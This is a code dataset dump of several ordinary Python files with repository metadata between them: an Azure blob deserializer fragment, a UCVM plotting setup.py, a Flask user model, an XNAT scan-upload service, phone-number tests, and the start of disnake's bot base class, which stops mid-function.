'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy),
'static_website': StaticWebsite._from_generated(generated.static_website),
}
def get_blob_properties_from_generated_code(generated):
blob = BlobProperties()
if generated.name.encoded:
blob.name = unquote(generated.name.content)
else:
blob.name = generated.name.content
blob_type = get_enum_value(generated.properties.blob_type)
blob.blob_type = BlobType(blob_type) if blob_type else None
blob.etag = generated.properties.etag
blob.deleted = generated.deleted
blob.snapshot = generated.snapshot
blob.is_append_blob_sealed = generated.properties.is_sealed
blob.metadata = generated.metadata.additional_properties if generated.metadata else {}
blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None
blob.lease = LeaseProperties._from_generated(generated)
blob.copy = CopyProperties._from_generated(generated)
blob.last_modified = generated.properties.last_modified
blob.creation_time = generated.properties.creation_time
blob.content_settings = ContentSettings._from_generated(generated)
blob.size = generated.properties.content_length
blob.page_blob_sequence_number = generated.properties.blob_sequence_number
blob.server_encrypted = generated.properties.server_encrypted
blob.encryption_scope = generated.properties.encryption_scope
blob.deleted_time = generated.properties.deleted_time
blob.remaining_retention_days = generated.properties.remaining_retention_days
blob.blob_tier = generated.properties.access_tier
blob.rehydrate_priority = generated.properties.rehydrate_priority
blob.blob_tier_inferred = generated.properties.access_tier_inferred
blob.archive_status = generated.properties.archive_status
blob.blob_tier_change_time = generated.properties.access_tier_change_time
blob.version_id = generated.version_id
blob.is_current_version = generated.is_current_version
blob.tag_count = generated.properties.tag_count
blob.tags = parse_tags(generated.blob_tags)
blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata)
blob.last_accessed_on = generated.properties.last_accessed_on
blob.immutability_policy = ImmutabilityPolicy._from_generated(generated)
blob.has_legal_hold = generated.properties.legal_hold
blob.has_versions_only = generated.has_versions_only
return blob
def parse_tags(generated_tags):
if generated_tags:
tag_dict = {t.key: t.value for t in generated_tags.blob_tag_set}
return tag_dict
return None
| true | true |
f71020a081e97b8e419611b4ff2a1a7fefc0a0c9 | 2,253 | py | Python | setup.py | SCECcode/ucvm_plotting | 0fad66043c81bdc5e616f87020f38177bdae9503 | [
"BSD-3-Clause"
] | null | null | null | setup.py | SCECcode/ucvm_plotting | 0fad66043c81bdc5e616f87020f38177bdae9503 | [
"BSD-3-Clause"
] | 4 | 2021-11-30T08:28:42.000Z | 2022-03-07T21:27:14.000Z | setup.py | SCECcode/ucvm_plotting | 0fad66043c81bdc5e616f87020f38177bdae9503 | [
"BSD-3-Clause"
] | 1 | 2021-06-05T03:28:51.000Z | 2021-06-05T03:28:51.000Z | """
@file setup.py
@brief Build and install the pycvm
@author The SCEC/UCVM Developers - <software@scec.usc.edu>
"""
from setuptools import setup
NAME = "ucvm_plotting"
FULLNAME = "ucvm_plotting with pycvm"
AUTHOR = "The SCEC/UCVM Developers"
AUTHOR_EMAIL = "software@scec.usc.edu"
MAINTAINER = AUTHOR
MAINTAINER_EMAIL = AUTHOR_EMAIL
LICENSE = "Apache 2.0 license"
URL = "https://github.com/SCEC/ucvm_plotting"
DESCRIPTION = "Python code extensions for UCVM and plotting library for the SCEC UCVM"
with open("README.md") as f:
LONG_DESCRIPTION = "".join(f.readlines())
VERSION = "0.0.2"
CLASSIFIERS = [
    # Trove classifiers must match https://pypi.org/classifiers/ exactly:
    # "Development Status :: 1 - Alpha" does not exist ("1" is Planning;
    # Alpha is "3"), and the Apache license classifier is spelled
    # "Apache Software License", not "{LICENSE}".
    "Development Status :: 3 - Alpha",
    "Intended Audience :: Science/Research",
    "Intended Audience :: Developers",
    "Intended Audience :: Education",
    "Topic :: Scientific/Engineering",
    "Topic :: Software Development :: Libraries",
    "Programming Language :: Python :: 2.7",
    "License :: OSI Approved :: Apache Software License",
]
PLATFORMS = "Any"
INSTALL_REQUIRES = ["numpy", "matplotlib", "basemap", "packaging"]
KEYWORDS = ["UCVM"]
if __name__ == "__main__":
setup(
name=NAME,
fullname=FULLNAME,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
license=LICENSE,
url=URL,
platforms=PLATFORMS,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
install_requires=INSTALL_REQUIRES,
packages=["pycvm"],
scripts=["ucvm_plotting/make_map_grid.py","ucvm_plotting/plot_compare_plot.py",
"ucvm_plotting/plot_cross_section.py","ucvm_plotting/plot_density_plot.py",
"ucvm_plotting/plot_depth_profile.py","ucvm_plotting/plot_elevation_cross_section.py",
"ucvm_plotting/plot_elevation_horizontal_slice.py","ucvm_plotting/plot_elevation_map.py",
"ucvm_plotting/plot_elevation_profile.py","ucvm_plotting/plot_horizontal_slice.py",
"ucvm_plotting/plot_scatter_plot.py","ucvm_plotting/plot_vs30_etree_map.py",
"ucvm_plotting/plot_vs30_map.py","ucvm_plotting/plot_z10_map.py",
"ucvm_plotting/plot_z25_map.py",
"utilities/makegrid.sh","utilities/view_png.py"]
)
| 33.132353 | 89 | 0.717266 |
from setuptools import setup
NAME = "ucvm_plotting"
FULLNAME = "ucvm_plotting with pycvm"
AUTHOR = "The SCEC/UCVM Developers"
AUTHOR_EMAIL = "software@scec.usc.edu"
MAINTAINER = AUTHOR
MAINTAINER_EMAIL = AUTHOR_EMAIL
LICENSE = "Apache 2.0 license"
URL = "https://github.com/SCEC/ucvm_plotting"
DESCRIPTION = "Python code extensions for UCVM and plotting library for the SCEC UCVM"
with open("README.md") as f:
LONG_DESCRIPTION = "".join(f.readlines())
VERSION = "0.0.2"
CLASSIFIERS = [
"Development Status :: 1 - Alpha",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: {}".format(LICENSE),
]
PLATFORMS = "Any"
INSTALL_REQUIRES = ["numpy", "matplotlib", "basemap", "packaging"]
KEYWORDS = ["UCVM"]
if __name__ == "__main__":
setup(
name=NAME,
fullname=FULLNAME,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
license=LICENSE,
url=URL,
platforms=PLATFORMS,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
install_requires=INSTALL_REQUIRES,
packages=["pycvm"],
scripts=["ucvm_plotting/make_map_grid.py","ucvm_plotting/plot_compare_plot.py",
"ucvm_plotting/plot_cross_section.py","ucvm_plotting/plot_density_plot.py",
"ucvm_plotting/plot_depth_profile.py","ucvm_plotting/plot_elevation_cross_section.py",
"ucvm_plotting/plot_elevation_horizontal_slice.py","ucvm_plotting/plot_elevation_map.py",
"ucvm_plotting/plot_elevation_profile.py","ucvm_plotting/plot_horizontal_slice.py",
"ucvm_plotting/plot_scatter_plot.py","ucvm_plotting/plot_vs30_etree_map.py",
"ucvm_plotting/plot_vs30_map.py","ucvm_plotting/plot_z10_map.py",
"ucvm_plotting/plot_z25_map.py",
"utilities/makegrid.sh","utilities/view_png.py"]
)
| true | true |
f71022c75b49c0c56102043edb4100618ba8208a | 348 | py | Python | models.py | ashelto6/unJumble | cf557668133186e7ea419f6f08ccadef4cad89a1 | [
"MIT"
] | null | null | null | models.py | ashelto6/unJumble | cf557668133186e7ea419f6f08ccadef4cad89a1 | [
"MIT"
] | 7 | 2021-02-26T07:31:12.000Z | 2021-04-25T03:21:35.000Z | models.py | ashelto6/unJumble | cf557668133186e7ea419f6f08ccadef4cad89a1 | [
"MIT"
] | null | null | null | from flask_login import UserMixin
from . import db
# Run the create_all() command to create the database tables.
class User(UserMixin, db.Model):
    """Application user account (Flask-Login compatible via UserMixin)."""
    id = db.Column(db.Integer, primary_key=True)
    last_name = db.Column(db.String(100))
    first_name = db.Column(db.String(100))
    # Unique per account -- presumably used as the login identifier; confirm against the auth views.
    email = db.Column(db.String(100), unique=True)
    # NOTE(review): stored as a plain String(100); confirm the value is hashed before insertion.
    password = db.Column(db.String(100))
from . import db
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
last_name = db.Column(db.String(100))
first_name = db.Column(db.String(100))
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100)) | true | true |
f71022f0eb2883e2876c9b9966ee83e21f069013 | 6,566 | py | Python | cookiecutter_mbam/scan/service.py | tiburona/cookiecutter_mbam | 13788774a4c1426c133b3f689f98d8f0c54de9c6 | [
"BSD-3-Clause"
] | null | null | null | cookiecutter_mbam/scan/service.py | tiburona/cookiecutter_mbam | 13788774a4c1426c133b3f689f98d8f0c54de9c6 | [
"BSD-3-Clause"
] | null | null | null | cookiecutter_mbam/scan/service.py | tiburona/cookiecutter_mbam | 13788774a4c1426c133b3f689f98d8f0c54de9c6 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Scan service.
This module implements uploading a scan file to XNAT and adding a scan to the database.
Todo: Maybe the public method should be called add, and that should kick off an upload procedure, rather than the
other way around.
Todo: do we want to infer file type from extension? Or use some other method?
Todo: Right now if we use the import service XNAT is inferring its own scan id. What do we want to do about that?
Todo: if someone uploads a zip file we don't actually know that there are dicoms inside (could be NIFTI). Consider this
fact.
Todo: Upload security for zip files?
"""
import os
from cookiecutter_mbam.xnat import XNATConnection
from cookiecutter_mbam.experiment import Experiment
from cookiecutter_mbam.user import User
from .models import Scan
from .utils import gzip_file
from flask import current_app
def debug():
    # Fails the assertion whenever the Flask app runs with debug enabled, so a
    # call to debug() halts execution at this point (presumably used as a
    # breakpoint helper with Flask's interactive debugger -- TODO confirm).
    assert current_app.debug == False, "Don't panic! You're here by request of debug()"
class ScanService:
    """Coordinates uploading a scan file to XNAT and recording it in the database."""

    def __init__(self, user_id, exp_id):
        self.user_id = user_id
        self.user = User.get_by_id(self.user_id)
        self.experiment = Experiment.get_by_id(exp_id)
        self.xc = XNATConnection()

    # todo: what is the actual URI of the experiment I've created? Why does it have the XNAT prefix?
    # maybe that's the accessor? Is the accessor in the URI?
    def upload(self, image_file):
        """The top level public method for adding a scan.

        Infers the file type (gzipping NIFTI files), generates XNAT identifiers
        and query strings, checks which XNAT identifiers already exist, uploads
        the scan to XNAT, adds the scan to the database, and updates the user,
        experiment, and scan records with their XNAT-related attributes.

        :param file object image_file: the file object
        :return: None
        """
        processed_file, dcm = self._process_file(image_file)
        # TODO(review): `processed_file` (possibly gzipped) is never used --
        # the original, unprocessed `image_file` is passed to upload_scan
        # below. Confirm whether the processed file should be uploaded instead.
        xnat_ids = self._generate_xnat_identifiers(dcm=dcm)
        existing_attributes = self._check_for_existing_xnat_ids()
        uris = self.xc.upload_scan(xnat_ids, existing_attributes, image_file, import_service=dcm)
        scan = self._add_scan()
        keywords = ['subject', 'experiment', 'scan']
        self._update_database_objects(
            keywords=keywords,
            objects=[self.user, self.experiment, scan],
            ids=['{}_id'.format(xnat_ids[kw]['xnat_id']) for kw in keywords],
            uris=uris,
        )

    def _add_scan(self):
        """Create the Scan row and increment the parent experiment's scan count.

        :return: the newly created scan
        """
        scan = Scan.create(experiment_id=self.experiment.id)
        self.experiment.num_scans += 1
        return scan

    def _process_file(self, image_file):
        """Infer the file type from its extension and transform it if needed.

        ``.nii`` files are gzipped; ``.zip`` archives are flagged so they go
        through XNAT's DICOM import service.

        :param file object image_file: the file object
        :return: two-tuple of the (possibly gzipped) file and a DICOM flag
        :rtype: tuple
        """
        file_name, file_ext = os.path.splitext(image_file.filename)
        dcm = False
        if file_ext == '.nii':
            image_file = gzip_file(image_file, file_name)
        if file_ext == '.zip':
            dcm = True
        return (image_file, dcm)

    def _generate_xnat_identifiers(self, dcm=False):
        """Generate object identifiers and query strings for use in XNAT.

        :return: dict keyed by XNAT object type ('subject', 'experiment',
            'scan', 'resource', 'file'); each value holds an 'xnat_id' and,
            optionally, a 'query_string' used in the PUT request that creates
            the object.
        :rtype: dict
        """
        xnat_ids = {}
        xnat_ids['subject'] = {'xnat_id': str(self.user_id).zfill(6)}
        xnat_exp_id = '{}_MR{}'.format(xnat_ids['subject']['xnat_id'], self.user.num_experiments)
        exp_date = self.experiment.date.strftime('%m/%d/%Y')
        xnat_ids['experiment'] = {'xnat_id': xnat_exp_id,
                                  'query_string': '?xnat:mrSessionData/date={}'.format(exp_date)}
        scan_number = self.experiment.num_scans + 1
        xnat_ids['scan'] = {'xnat_id': 'T1_{}'.format(scan_number),
                            'query_string': '?xsiType=xnat:mrScanData'}
        xnat_ids['resource'] = {'xnat_id': 'DICOM' if dcm else 'NIFTI'}
        xnat_ids['file'] = {'xnat_id': 'T1.nii.gz', 'query_string': '?xsi:type=xnat:mrScanData'}
        return xnat_ids

    def _check_for_existing_xnat_ids(self):
        """Look up existing XNAT identifiers on the user and experiment.

        :return: dict mapping 'xnat_subject_id' and 'xnat_experiment_id' to
            the stored value, or '' when not yet set.
        :rtype: dict
        """
        sources = {'xnat_subject_id': self.user, 'xnat_experiment_id': self.experiment}
        return {attr: getattr(model, attr) if getattr(model, attr) else ''
                for attr, model in sources.items()}

    def _update_database_objects(self, objects=(), keywords=(), uris=(), ids=()):
        """Store XNAT uri/id attributes on the given database objects.

        Only sets an attribute when the object does not already have it.
        Defaults are immutable tuples rather than the original mutable lists,
        which Python shares across calls.

        :param objects: user, experiment, and scan
        :param keywords: 'subject', 'experiment', and 'scan'
        :param uris: xnat uris
        :param ids: xnat ids
        :return: None
        """
        for obj, kw, uri, obj_id in zip(objects, keywords, uris, ids):
            if not hasattr(obj, 'xnat_uri'):
                obj.update({'xnat_uri': uri})
            if not hasattr(obj, 'xnat_{}_id'.format(kw)):
                obj.update({'xnat_{}_id'.format(kw): obj_id})
| 38.397661 | 120 | 0.655955 |
import os
from cookiecutter_mbam.xnat import XNATConnection
from cookiecutter_mbam.experiment import Experiment
from cookiecutter_mbam.user import User
from .models import Scan
from .utils import gzip_file
from flask import current_app
def debug():
assert current_app.debug == False, "Don't panic! You're here by request of debug()"
class ScanService:
def __init__(self, user_id, exp_id):
self.user_id = user_id
self.user = User.get_by_id(self.user_id)
self.experiment = Experiment.get_by_id(exp_id)
self.xc = XNATConnection()
# maybe that's the accessor? Is the accessor in the URI?
def upload(self, image_file):
file, dcm = self._process_file(image_file)
xnat_ids = self._generate_xnat_identifiers(dcm=dcm)
existing_attributes = self._check_for_existing_xnat_ids()
uris = self.xc.upload_scan(xnat_ids, existing_attributes, image_file, import_service=dcm)
scan = self._add_scan()
keywords = ['subject', 'experiment', 'scan']
self._update_database_objects(keywords=keywords, objects=[self.user, self.experiment, scan],
ids=['{}_id'.format(xnat_ids[kw]['xnat_id']) for kw in keywords], uris=uris)
def _add_scan(self):
scan = Scan.create(experiment_id=self.experiment.id)
self.experiment.num_scans += 1
return scan
def _process_file(self, image_file):
image_file_name = image_file.filename
file_name, file_ext = os.path.splitext(image_file_name)
dcm = False
if file_ext == '.nii':
image_file = (gzip_file(image_file, file_name))
if file_ext == '.zip':
dcm = True
return (image_file, dcm)
def _generate_xnat_identifiers(self, dcm=False):
xnat_ids = {}
xnat_ids['subject'] = {'xnat_id': str(self.user_id).zfill(6)}
xnat_exp_id = '{}_MR{}'.format(xnat_ids['subject']['xnat_id'], self.user.num_experiments)
exp_date = self.experiment.date.strftime('%m/%d/%Y')
xnat_ids['experiment'] = {'xnat_id': xnat_exp_id, 'query_string':'?xnat:mrSessionData/date={}'.format(exp_date)}
scan_number = self.experiment.num_scans + 1
xnat_scan_id = 'T1_{}'.format(scan_number)
xnat_ids['scan'] = {'xnat_id':xnat_scan_id, 'query_string':'?xsiType=xnat:mrScanData'}
if dcm:
resource = 'DICOM'
else:
resource = 'NIFTI'
xnat_ids['resource'] = {'xnat_id': resource}
xnat_ids['file'] = {'xnat_id':'T1.nii.gz', 'query_string':'?xsi:type=xnat:mrScanData'}
return xnat_ids
def _check_for_existing_xnat_ids(self):
return {k: getattr(v, k) if getattr(v, k) else '' for k, v in {'xnat_subject_id': self.user,
'xnat_experiment_id': self.experiment}.items()}
def _update_database_objects(self, objects=[], keywords=[], uris=[], ids=[],):
attributes = zip(objects, keywords, uris, ids)
for (obj, kw, uri, id) in attributes:
if not hasattr(obj, 'xnat_uri'):
obj.update({'xnat_uri': uri})
if not hasattr(obj,'xnat_{}_id'.format(kw)):
obj.update({'xnat_{}_id'.format(kw): id})
| true | true |
f710230f2cb958286fd2cd383520343ffe344500 | 1,403 | py | Python | tests/utils/test_phone_numbers.py | Silvian/attendance-processor | b40eacf7fe8ab9473f7a75a8c8e0cc7ac03fb507 | [
"MIT"
] | 1 | 2020-10-29T13:07:25.000Z | 2020-10-29T13:07:25.000Z | tests/utils/test_phone_numbers.py | Silvian/attendance-processor | b40eacf7fe8ab9473f7a75a8c8e0cc7ac03fb507 | [
"MIT"
] | null | null | null | tests/utils/test_phone_numbers.py | Silvian/attendance-processor | b40eacf7fe8ab9473f7a75a8c8e0cc7ac03fb507 | [
"MIT"
] | null | null | null | import pytest
from utils.phone_numbers import fix_number_formatting, validate_phone_number
@pytest.mark.parametrize(
    "number, expected_result",
    [
        ("7446123456", "07446123456"),  # Test number with missing 0
        ("07446123456", "07446123456"),  # Test number no spaces
        ("07446 123456", "07446123456"),  # Test number with spaces
        ("+447446123456", "+447446123456"),  # Test international number no spaces
        ("+447446 123456", "+447446123456"),  # Test international number with spaces
        ("+4407446123456", "+447446123456"),  # Test international number with a 0
        ("+44 07446 123456", "+447446123456"),  # Test international number with a 0 and spaces
    ],
)
def test_fix_number_formatting(number, expected_result):
    """fix_number_formatting strips spaces and normalises leading-zero / +44 prefix forms."""
    result = fix_number_formatting(number)
    assert expected_result == result
@pytest.mark.parametrize(
    "number, expected_result",
    [
        ("07446123456", True),  # Test number is valid
        ("074461234567", False),  # Test number is too long
        ("+447446123456", True),  # Test international number is valid
        ("+4407446123456", False),  # Test international number contains 0
        ("+4474461234567", False),  # Test international number is too long 0
    ]
)
def test_validate_phone_number(number, expected_result):
    """validate_phone_number accepts well-formed UK numbers and rejects malformed ones."""
    result = validate_phone_number(number)
    assert expected_result == result
| 37.918919 | 95 | 0.680684 | import pytest
from utils.phone_numbers import fix_number_formatting, validate_phone_number
@pytest.mark.parametrize(
"number, expected_result",
[
("7446123456", "07446123456"),
("07446123456", "07446123456"),
("07446 123456", "07446123456"),
("+447446123456", "+447446123456"),
("+447446 123456", "+447446123456"),
("+4407446123456", "+447446123456"),
("+44 07446 123456", "+447446123456"),
],
)
def test_fix_number_formatting(number, expected_result):
result = fix_number_formatting(number)
assert expected_result == result
@pytest.mark.parametrize(
"number, expected_result",
[
("07446123456", True),
("074461234567", False),
("+447446123456", True),
("+4407446123456", False),
("+4474461234567", False),
]
)
def test_validate_phone_number(number, expected_result):
result = validate_phone_number(number)
assert expected_result == result
| true | true |
f71023e323fa23d2cf2eaffc7221a695ba60060f | 20,092 | py | Python | disnake/ext/commands/bot_base.py | MisileLab/disnake | c7f6a61f2fe2a05cb57027486d6f2cd7fe5399fa | [
"MIT"
] | null | null | null | disnake/ext/commands/bot_base.py | MisileLab/disnake | c7f6a61f2fe2a05cb57027486d6f2cd7fe5399fa | [
"MIT"
] | null | null | null | disnake/ext/commands/bot_base.py | MisileLab/disnake | c7f6a61f2fe2a05cb57027486d6f2cd7fe5399fa | [
"MIT"
] | null | null | null | """
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Disnake Development
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import asyncio
import collections
import collections.abc
import inspect
import sys
import traceback
from typing import Any, Callable, List, TYPE_CHECKING, Optional, TypeVar, Type, Union
import disnake
from .core import GroupMixin
from .view import StringView
from .context import Context
from . import errors
from .help import HelpCommand, DefaultHelpCommand
from .common_bot_base import CommonBotBase
if TYPE_CHECKING:
from typing_extensions import ParamSpec
from disnake.message import Message
from disnake.interactions import ApplicationCommandInteraction
from ._types import (
Check,
CoroFunc,
)
ApplicationCommandInteractionT = TypeVar(
"ApplicationCommandInteractionT", bound=ApplicationCommandInteraction, covariant=True
)
AnyMessageCommandInter = Any # Union[ApplicationCommandInteraction, UserCommandInteraction]
AnyUserCommandInter = Any # Union[ApplicationCommandInteraction, UserCommandInteraction]
P = ParamSpec("P")
__all__ = (
"when_mentioned",
"when_mentioned_or",
"BotBase",
)
MISSING: Any = disnake.utils.MISSING
T = TypeVar("T")
CFT = TypeVar("CFT", bound="CoroFunc")
CXT = TypeVar("CXT", bound="Context")
def when_mentioned(bot: BotBase, msg: Message) -> List[str]:
"""A callable that implements a command prefix equivalent to being mentioned.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
"""
# bot.user will never be None when this is called
return [f"<@{bot.user.id}> ", f"<@!{bot.user.id}> "] # type: ignore
def when_mentioned_or(*prefixes: str) -> Callable[[BotBase, Message], List[str]]:
"""A callable that implements when mentioned or other prefixes provided.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
Example
--------
.. code-block:: python3
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
.. note::
This callable returns another callable, so if this is done inside a custom
callable, you must call the returned callable, for example:
.. code-block:: python3
async def get_prefix(bot, message):
extras = await prefixes_for(message.guild) # returns a list
return commands.when_mentioned_or(*extras)(bot, message)
See Also
----------
:func:`.when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r = when_mentioned(bot, msg) + r
return r
return inner
def _is_submodule(parent: str, child: str) -> bool:
return parent == child or child.startswith(parent + ".")
class _DefaultRepr:
def __repr__(self):
return "<default-help-command>"
_default: Any = _DefaultRepr()
class BotBase(CommonBotBase, GroupMixin):
def __init__(
self,
command_prefix: Optional[Union[str, List[str], Callable]] = None,
help_command: HelpCommand = _default,
description: str = None,
**options: Any,
):
super().__init__(**options)
self.command_prefix = command_prefix
self._checks: List[Check] = []
self._check_once = []
self._before_invoke = None
self._after_invoke = None
self._help_command = None
self.description: str = inspect.cleandoc(description) if description else ""
self.strip_after_prefix: bool = options.get("strip_after_prefix", False)
if help_command is _default:
self.help_command = DefaultHelpCommand()
else:
self.help_command = help_command
# internal helpers
async def on_command_error(self, context: Context, exception: errors.CommandError) -> None:
"""|coro|
The default command error handler provided by the bot.
By default this prints to :data:`sys.stderr` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get("on_command_error", None):
return
command = context.command
if command and command.has_error_handler():
return
cog = context.cog
if cog and cog.has_error_handler():
return
print(f"Ignoring exception in command {context.command}:", file=sys.stderr)
traceback.print_exception(
type(exception), exception, exception.__traceback__, file=sys.stderr
)
# global check registration
def add_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`.check`,
:meth:`.check_once`, :meth:`.slash_command_check` and etc.
If none of bool params are specified, the check is for
text commands only.
Parameters
-----------
func
The function that was used as a global check.
call_once: :class:`bool`
If the function should only be called once per
:meth:`.invoke` call.
"""
if call_once:
self._check_once.append(func)
else:
self._checks.append(func)
def remove_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
If none of bool params are specified, the check is for
text commands only.
Parameters
-----------
func
The function to remove from the global checks.
call_once: :class:`bool`
If the function was added with ``call_once=True`` in
the :meth:`.Bot.add_check` call or using :meth:`.check_once`.
"""
l = self._check_once if call_once else self._checks
try:
l.remove(func)
except ValueError:
pass
def check(self, func: T) -> T:
r"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`.check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check
def check_commands(ctx):
return ctx.command.qualified_name in allowed_commands
"""
# T was used instead of Check to ensure the type matches on return
self.add_check(func) # type: ignore
return func
def check_once(self, func: CFT) -> CFT:
r"""A decorator that adds a "call once" global check to the bot.
Unlike regular global checks, this one is called only once
per :meth:`.invoke` call.
Regular global checks are called whenever a command is called
or :meth:`.Command.can_run` is called. This type of check
bypasses that and ensures that it's called only once, even inside
the default help command.
.. note::
When using this function the :class:`.Context` sent to a group subcommand
may only parse the parent command and not the subcommands due to it
being invoked once per :meth:`.Bot.invoke` call.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check_once
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func, call_once=True)
return func
async def can_run(self, ctx: Context, *, call_once: bool = False) -> bool:
data = self._check_once if call_once else self._checks
if len(data) == 0:
return True
# type-checker doesn't distinguish between functions and methods
return await disnake.utils.async_all(f(ctx) for f in data) # type: ignore
def before_invoke(self, coro: CFT) -> CFT:
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
The :meth:`~.Bot.before_invoke` and :meth:`~.Bot.after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the pre-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The pre-invoke hook must be a coroutine.")
self._before_invoke = coro
return coro
def after_invoke(self, coro: CFT) -> CFT:
r"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
Similar to :meth:`~.Bot.before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`.CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the post-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The post-invoke hook must be a coroutine.")
self._after_invoke = coro
return coro
# extensions
def _remove_module_references(self, name: str) -> None:
super()._remove_module_references(name)
# remove all the commands from the module
for cmd in self.all_commands.copy().values():
if cmd.module is not None and _is_submodule(name, cmd.module):
if isinstance(cmd, GroupMixin):
cmd.recursively_remove_all_commands()
self.remove_command(cmd.name)
# help command stuff
@property
def help_command(self) -> Optional[HelpCommand]:
return self._help_command
@help_command.setter
def help_command(self, value: Optional[HelpCommand]) -> None:
if value is not None:
if not isinstance(value, HelpCommand):
raise TypeError("help_command must be a subclass of HelpCommand")
if self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = value
value._add_to_bot(self)
elif self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = None
else:
self._help_command = None
# command processing
async def get_prefix(self, message: Message) -> Optional[Union[List[str], str]]:
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`disnake.Message`
The message context to get the prefix of.
Returns
--------
Optional[Union[List[:class:`str`], :class:`str`]]
A list of prefixes or a single prefix that the bot is
listening for. None if the bot isn't listening for prefixes.
"""
prefix = ret = self.command_prefix
if callable(prefix):
ret = await disnake.utils.maybe_coroutine(prefix, self, message)
if ret is None:
return None
if not isinstance(ret, str):
try:
ret = list(ret) # type: ignore
except TypeError:
# It's possible that a generator raised this exception. Don't
# replace it with our own error if that's the case.
if isinstance(ret, collections.abc.Iterable):
raise
raise TypeError(
"command_prefix must be plain string, iterable of strings, or callable "
f"returning either of these, not {ret.__class__.__name__}"
)
if not ret:
raise ValueError("Iterable command_prefix must contain at least one prefix")
return ret
async def get_context(self, message: Message, *, cls: Type[CXT] = Context) -> CXT:
r"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`.process_commands`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`.Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`~.Bot.invoke`.
Parameters
-----------
message: :class:`disnake.Message`
The message to get the invocation context from.
cls
The factory class that will be used to create the context.
By default, this is :class:`.Context`. Should a custom
class be provided, it must be similar enough to :class:`.Context`\'s
interface.
Returns
--------
:class:`.Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if message.author.id == self.user.id: # type: ignore
return ctx
prefix = await self.get_prefix(message)
